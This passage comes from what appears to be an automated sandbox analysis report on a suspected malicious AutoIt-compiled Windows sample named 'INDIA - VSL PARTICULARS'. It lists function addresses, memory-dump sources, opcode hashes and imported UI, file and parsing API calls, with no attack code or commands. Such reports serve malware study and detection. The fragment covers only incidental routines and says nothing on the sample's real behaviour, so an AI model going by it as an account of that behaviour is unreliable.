                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: N@
                              • API String ID: 0-1509896676
                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                              Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                              • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                              • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                              • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                              Function 004129D0 Relevance: .4, Instructions: 355COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                              Function 004125E8 Relevance: .3, Instructions: 349COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                              Function 00412216 Relevance: .3, Instructions: 332COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                              Function 03F20B18 Relevance: .1, Instructions: 92COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                              • Instruction ID: 02d6163b93c05515ba550c20263bcf17e7f104e2341538ac0d4ee6ad2c62e11e
                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                              • Instruction Fuzzy Hash: D241A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                              Function 03F209A8 Relevance: .0, Instructions: 35COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                              • Instruction ID: 38f221608edee91d232daddfb4e47f275e1236f3e7fd847f684ea8135e9f344b
                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                              • Instruction Fuzzy Hash: 23019279E0020AEFCB44DF98C5909AEFBB5FB48310F20859AD809A7701D730AE41DB80
                              Function 03F20A08 Relevance: .0, Instructions: 35COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                              • Instruction ID: 48017eef1071b47c802fc85e8abde09da200141e462bc2a8e6448e01bad52dca
                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                              • Instruction Fuzzy Hash: 7F019279E0020AEFCB44DF98C5909AEFBB5FB48310F608599E809A7701D730AE41DF80
                              Function 03F1F338 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                              Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                              Download Yara Rule
                              APIs
                              • DeleteObject.GDI32(?), ref: 0045953B
                              • DeleteObject.GDI32(?), ref: 00459551
                              • DestroyWindow.USER32(?), ref: 00459563
                              • GetDesktopWindow.USER32 ref: 00459581
                              • GetWindowRect.USER32(00000000), ref: 00459588
                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                              • ShowWindow.USER32(?,00000004), ref: 00459865
                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                              • GetStockObject.GDI32(00000011), ref: 004598CD
                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                              • DeleteDC.GDI32(00000000), ref: 004598F8
                              • _wcslen.LIBCMT ref: 00459916
                              • _wcscpy.LIBCMT ref: 0045993A
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                              • GetDC.USER32(00000000), ref: 004599FC
                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                              • String ID: $AutoIt v3$DISPLAY$static
                              • API String ID: 4040870279-2373415609
                              • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                              • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                              • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                              • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                              Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                              Download Yara Rule
                              APIs
                              • GetSysColor.USER32(00000012), ref: 0044181E
                              • SetTextColor.GDI32(?,?), ref: 00441826
                              • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                              • GetSysColor.USER32(0000000F), ref: 00441849
                              • SetBkColor.GDI32(?,?), ref: 00441864
                              • SelectObject.GDI32(?,?), ref: 00441874
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                              • GetSysColor.USER32(00000010), ref: 004418B2
                              • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                              • FrameRect.USER32(?,?,00000000), ref: 004418CA
                              • DeleteObject.GDI32(?), ref: 004418D5
                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                              • FillRect.USER32(?,?,?), ref: 00441970
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                              • String ID:
                              • API String ID: 69173610-0
                              • Opcode ID: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                              • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                              • Opcode Fuzzy Hash: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                              • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                              Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(?), ref: 004590F2
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                              • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                              • GetClientRect.USER32(00000000,?), ref: 0045924E
                              • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                              • GetStockObject.GDI32(00000011), ref: 004592AC
                              • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                              • DeleteDC.GDI32(00000000), ref: 004592D6
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                              • GetStockObject.GDI32(00000011), ref: 004593D3
                              • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                              • API String ID: 2910397461-517079104
                              • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                              • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                              • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                              • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                              Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                              • API String ID: 1038674560-3360698832
                              • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                              • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                              • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                              • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                              Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                              Download Yara Rule
                              APIs
                              • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                              • SetCursor.USER32(00000000), ref: 0043075B
                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                              • SetCursor.USER32(00000000), ref: 00430773
                              • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                              • SetCursor.USER32(00000000), ref: 0043078B
                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                              • SetCursor.USER32(00000000), ref: 004307A3
                              • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                              • SetCursor.USER32(00000000), ref: 004307BB
                              • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                              • SetCursor.USER32(00000000), ref: 004307D3
                              • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                              • SetCursor.USER32(00000000), ref: 004307EB
                              • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                              • SetCursor.USER32(00000000), ref: 00430803
                              • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                              • SetCursor.USER32(00000000), ref: 0043081B
                              • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                              • SetCursor.USER32(00000000), ref: 00430833
                              • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                              • SetCursor.USER32(00000000), ref: 0043084B
                              • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                              • SetCursor.USER32(00000000), ref: 00430863
                              • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                              • SetCursor.USER32(00000000), ref: 0043087B
                              • SetCursor.USER32(00000000), ref: 00430887
                              • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                              • SetCursor.USER32(00000000), ref: 0043089F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Cursor$Load
                              • String ID:
                              • API String ID: 1675784387-0
                              • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                              • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                              Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetSysColor.USER32(0000000E), ref: 00430913
                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                              • GetSysColor.USER32(00000012), ref: 00430933
                              • SetTextColor.GDI32(?,?), ref: 0043093B
                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                              • GetSysColor.USER32(0000000F), ref: 00430959
                              • CreateSolidBrush.GDI32(?), ref: 00430962
                              • GetSysColor.USER32(00000011), ref: 00430979
                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                              • SelectObject.GDI32(?,00000000), ref: 0043099C
